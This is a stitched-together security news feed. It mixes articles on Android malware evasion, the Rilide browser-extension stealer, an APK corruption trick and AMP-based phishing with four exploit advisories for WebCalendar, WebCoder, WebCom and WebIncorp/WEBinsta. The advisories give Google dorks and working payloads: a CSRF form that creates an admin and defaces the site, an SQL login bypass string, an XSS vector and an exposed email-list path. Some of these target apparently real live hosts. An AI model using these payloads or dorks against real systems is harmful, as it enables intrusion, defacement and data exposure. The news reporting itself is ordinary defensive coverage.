Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users.
"Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) said in its August 2023 Threat Horizons Report shared with The Hacker News.
While versioning is not a new phenomenon, it's sneaky and hard

Mobile Security / Malware

Threat actors are leveraging a technique called versioning to evade Google Play Store's malware detections and target Android users.

"Campaigns using versioning commonly target users' credentials, data, and finances," Google Cybersecurity Action Team (GCAT) said in its August 2023 Threat Horizons Report shared with The Hacker News.

While versioning is not a new phenomenon, it's sneaky and hard to detect. In this method, a developer releases an initial version of an app on the Play Store that passes Google's pre-publication checks, but is later updated with a malware component.

This is achieved by pushing an update from an attacker-controlled server to serve malicious code on the end user device using a method called dynamic code loading (DCL), effectively turning the app into a backdoor.

Earlier this May, ESET discovered a screen recording app named "iRecorder - Screen Recorder" that remained innocuous for nearly a year after it was first uploaded to the Play Store before malicious changes were introduced sneakily to spy on its users.

Another example of malware using the DCL method is SharkBot, which has repeatedly made an appearance on the Play Store by masquerading as security and utility apps.

SharkBot is a financial trojan that initiates unauthorized money transfers from compromised devices using the Automated Transfer Service (ATS) protocol.

Dropper applications that appear on the storefront come with reduced functionality that, once installed by the victims, download a full version of the malware in a bid to attract less attention.

"In an enterprise environment, versioning demonstrates a need for defense-in-depth principles, including but not limited to limiting application installation sources to trusted sources such as Google Play or managing corporate devices via a mobile device management (MDM) platform," the company said.

The findings come as ThreatFabric revealed that malware purveyors have been exploiting a bug in Android to pass off malicious apps as benign by "corrupting components of an app" such that the app as a whole remains valid, according to KrebsOnSecurity.

"Actors can have several apps published in the store at the same time under different developer accounts, however, only one is acting as malicious, while the other is a backup to be used after takedown," the Dutch cybersecurity company noted in June.

"Such a tactic helps actors to maintain very long campaigns, minimizing the time needed to publish another dropper and continue the distribution campaign."

To mitigate any potential risks, it's recommended that Android users stick to trusted sources for downloading apps and enable Google Play Protect to receive notifications when a potentially harmful app (PHA) is found on the device.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners

Cybersecurity researchers have discovered a new version of malware called Rilide that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency.
"It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel

Browser Security / Malware

Cybersecurity researchers have discovered a new version of malware called **Rilide** that targets Chromium-based web browsers to steal sensitive data and steal cryptocurrency.

"It exhibits a higher level of sophistication through modular design, code obfuscation, adoption to the Chrome Extension Manifest V3, and additional features such as the ability to exfiltrate stolen data to a Telegram channel or interval-based screenshot captures," Trustwave security researcher Pawel Knapczyk said in a report shared with The Hacker News.

Rilide was first documented by the cybersecurity company in April 2023, uncovering two different attack chains that made use of Ekipa RAT and Aurora Stealer to deploy rogue browser extensions capable of data and crypto theft. It's sold on dark web forums by an actor named "friezer" for $5,000.

The malware is equipped with a wide range of features that allow it to disable other browser add-ons, harvest browsing history and cookies, collect login credentials, take screenshots, and inject malicious scripts to withdraw funds from various cryptocurrency exchanges.

The updated version also overlaps with malware tracked by Trellix under the name CookieGenesis, with the extension now making use of Chrome Extension Manifest V3, a controversial application programming interface (API) change introduced by Google that aims to curtail broad access given to extensions.

"With security in mind, one of the new major improvements is that extensions can't load remote JavaScript code and execute arbitrary strings," Knapczyk explained. "Specifically, all logic must be included in the extension package thus allowing the more reliable and effective review process for the extensions submitted to the Chrome Web Store."

This has led to a complete refactor of Rilide's core capabilities, Trustwave said, adding the malware relies on the use of inline events to execute malicious JavaScript code.

Two Rilide artifacts detected in the wild have been found to impersonate Palo Alto Networks' GlobalProtect app to deceive unsuspecting users into installing the malware as part of three different campaigns. One set of attacks are designed to singled out users in Australia and the U.K.

It's suspected that the threat actors use bogus landing pages hosting legitimate AnyDesk remote desktop software and employ vishing tactics to guide potential targets to install the application, and subsequently leverage the remote access to deploy the malware.

Another significant update to the modus operandi involves the use of a PowerShell loader to modify the browser's Secure Preferences file – which keeps the state of a user's personal browsing experience – to launch the application with the extension loaded permanently.

A further analysis of the command-and-control (C2) domain based on the registrant information shows a connection to a larger pool of websites, many of which have been observed serving malware such as Bumblebee, IcedID, and Phorpiex.

It's worth noting that source code of the Rilide extension was leaked in February 2023, raising the possibility that threat actors other than the original author might have picked up the development efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script>    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCalendar 1.3 Cross Site Request Forgery

WebCoder CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : WebCoder CMS v1.0 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/webcoder-fully-customizable-cms/22745929                                               |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /%5c/faq[+]  https://cmswebcoderaz/%5c/faqGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCoder CMS 1.0 SQL Injection

WebCom CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WebCom CMS v1.0 Auth By pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : "Powered by Web.Com(India) Pvt. Ltd"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : admin'-- - & Pass : indoushka[+] http://winternationalhospcom/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCom CMS 1.0 SQL Injection

WebIncorp CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : WebIncorp CMS v1.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://www.webincorp.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /product_detail.php?prod_id=132'"><svg/onload=prompt(1337);>[+] https://wfutureqatarqa/product_detail.php?prod_id=132%27%22%3E%3Csvg/onload=prompt(1337);%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebIncorp CMS 1.0 Cross Site Scripting

WEBinsta Mailing Manager version 1.3 suffers from an information disclosure vulnerability.

    ====================================================================================================================================| # Title     : WEBinsta Mailing Manager V1.3 Data Disclosure Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.webinsta.com                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : maillist/temp/email.txt[+] http://lolpriceshopinfo/maillist/temp/email.txtGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WEBinsta Mailing Manager 1.3 Information Disclosure

Researchers say mobile malware purveyors have been abusing a bug in the Google Android platform that lets them sneak malicious code into benign mobile apps and evade security scanning tools. Google says it has updated its app malware detection mechanisms in response to the new research.

Researchers say mobile malware purveyors have been abusing a bug in the **Google Android** platform that lets them sneak malicious code into benign mobile apps and evade security scanning tools. Google says it has updated its app malware detection mechanisms in response to the new research.

At issue is a mobile malware obfuscation method identified by researchers at ThreatFabric, a security firm based in Amsterdam. **Aleksandr Eremin**, a senior malware analyst at the company, told KrebsOnSecurity they recently encountered a number of mobile banking trojans abusing a bug present in all Android OS versions that involves corrupting components of an app so that its new evil bits will be ignored as invalid by popular mobile security scanning tools, while the app as a whole gets accepted as valid by Android OS and successfully installed.

“There is malware that is patching the .apk file \[the app installation file\], so that the platform is still treating it as valid and runs all the malicious actions it’s designed to do, while at the same time a lot of tools designed to unpack and decompile these apps fail to process the code,” Eremin explained.

Eremin said ThreatFabric has seen this malware obfuscation method used a few times in the past, but in April 2023 it started finding many more variants of known mobile malware families leveraging it for stealth. The company has since attributed this increase to a semi-automated malware-as-a-service offering in the cybercrime underground that will obfuscate or “crypt” malicious mobile apps for a fee.

Eremin said Google flagged their initial May 9, 2023 report as “high” severity. More recently, Google awarded them a $5,000 bug bounty, even though it did not technically classify their finding as a security vulnerability.

“This was a unique situation in which the reported issue was not classified as a vulnerability and did not impact the Android Open Source Project (AOSP), but did result in an update to our malware detection mechanisms for apps that might try to abuse this issue,” Google said in a written statement.

Google also acknowledged that some of the tools it makes available to developers — including APK Analyzer — currently fail to parse such malicious applications and treat them as invalid, while still allowing them to be installed on user devices.

“We are investigating possible fixes for developer tools and plan to update our documentation accordingly,” Google’s statement continued.

Image: ThreatFabric.

According to ThreatFabric, there are a few telltale signs that app analyzers can look for that may indicate a malicious app is abusing the weakness to masquerade as benign. For starters, they found that apps modified in this way have Android Manifest files that contain newer timestamps than the rest of the files in the software package.

More critically, the Manifest file itself will be changed so that the number of “strings” — plain text in the code, such as comments — specified as present in the app does match the actual number of strings in the software.

One of the mobile malware families known to be abusing this obfuscation method has been dubbed **Anatsa**, which is a sophisticated Android-based banking trojan that typically is disguised as a harmless application for managing files. Last month, ThreatFabric detailed how the crooks behind Anatsa will purchase older, abandoned file managing apps, or create their own and let the apps build up a considerable user base before updating them with malicious components.

ThreatFabric says Anatsa poses as PDF viewers and other file managing applications because these types of apps already have advanced permissions to remove or modify other files on the host device. The company estimates the people behind Anatsa have delivered more than 30,000 installations of their banking trojan via ongoing Google Play Store malware campaigns.

Google has come under fire in recent months for failing to more proactively police its Play Store for malicious apps, or for once-legitimate applications that later go rogue. This May 2023 story from _Ars Technica_ about a formerly benign screen recording app that turned malicious after garnering 50,000 users notes that Google doesn’t comment when malware is discovered on its platform, beyond thanking the outside researchers who found it and saying the company removes malware as soon as it learns of it.

“The company has never explained what causes its own researchers and automated scanning process to miss malicious apps discovered by outsiders,” Ars’ **Dan Goodin** wrote. “Google has also been reluctant to actively notify Play users once it learns they were infected by apps promoted and made available by its own service.”

The Ars story mentions one potentially positive change by Google of late: A preventive measure available in Android versions 11 and higher that implements “app hibernation,” which puts apps that have been dormant into a hibernation state that removes their previously granted runtime permissions.

How Malicious Android Apps Slip Into Disguise

Categories: Awareness
Categories: News
Tags: phishing

Tags:  amp

Tags:  url

Tags:  captcha

Tags:  redirection

Researchers have found a new phishing tactic that uses Google Accelerated Mobile Pages (AMP) URLs to look trustworthy



(Read more...)




The post Phishing campaigns are using AMP URLs to avoid detection appeared first on Malwarebytes Labs.

Researchers have found a new phishing tactic which uses Google Accelerated Mobile Pages (AMP) to make URLs look trustworthy. The tactic is designed to slip past both software and users on the lookout for strange and untrustworthy domain names.

AMP is an open-source HTML framework designed to make web content load faster on mobile devices. The framework was originally created by Google, but over 30 news publishers and several technology companies have collaborated on the project.

AMP works by stripping bloat from web pages by forcing heavy restrictions on the kind of code that can be included. If it's slow, you can't have it. The stripped down pages are served from caches so they load faster, and the most popular cache by far is Google's.

The phishing technique uses the URL of a web page cached by the Google AMP Viewer. For example, the home page of the website example.com would appear in the Google AMP Viewer as https://www.google.com/amp/s/example.com.

Although they look similar, and both contain 'example.com', the crucial difference is the first is served from the example.com domain and the second is served from the google.com domain.

Because of that, it's just another web page on the google.com website and therefore inherits alll the trust that very well known domain name carries with both individuals and software, like email filters. And while it's possible to block everything under https://google.com/amp/s/, that would inevitably block huge numbers of legitimate websites as well.

Threat actors can use this technique to cloak malicious websites in the legitimacy of the google.com domain, or they can use it to trigger redirects from the AMP URL to a malicious site.

The researchers found that the Google AMP URLs have proven to be very successful at reaching users, even in environments protected by secure email gateways.

Alongside the use of AMP URLs, the researchers also saw:

*   Open redirects on trusted domains like microsoft.com being used.
*   Chains of redirects linking the AMP URL to the malicious site, not just a single redirect.
*   Image-based phishing emails that bypass filters looking for common phrases in text.
*   CAPTCHA services used to disrupt automated analysis.

Using CAPTCHAs, the attackers try to keep automated crawlers belonging to security vendors and researchers out, and only let humans through that are rife to be phished. I used the word “try” in that last sentence on purpose because there are several crawlers out there that are equipped with CAPTCHA solving abilities that outperform mine.

**How to avoid phishing attacks**

*   Don't take things at face value. Phishing attacks often seem to come from people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   Take action. If you receive a phishing attempt at work, report it to your IT or security team. If you fall for a phish, make your data useless: If you entered a password, change it, if you entered credit card details, cancel the card.
*   Use a password manager. Password managers can create, remember, and fill in passwords for you. They protect you against phishing because they won't enter your credentials into a fake site.
*   Use a FIDO2 2FA device. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Phishing campaigns are using AMP URLs to avoid detection

Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)

Tag

#google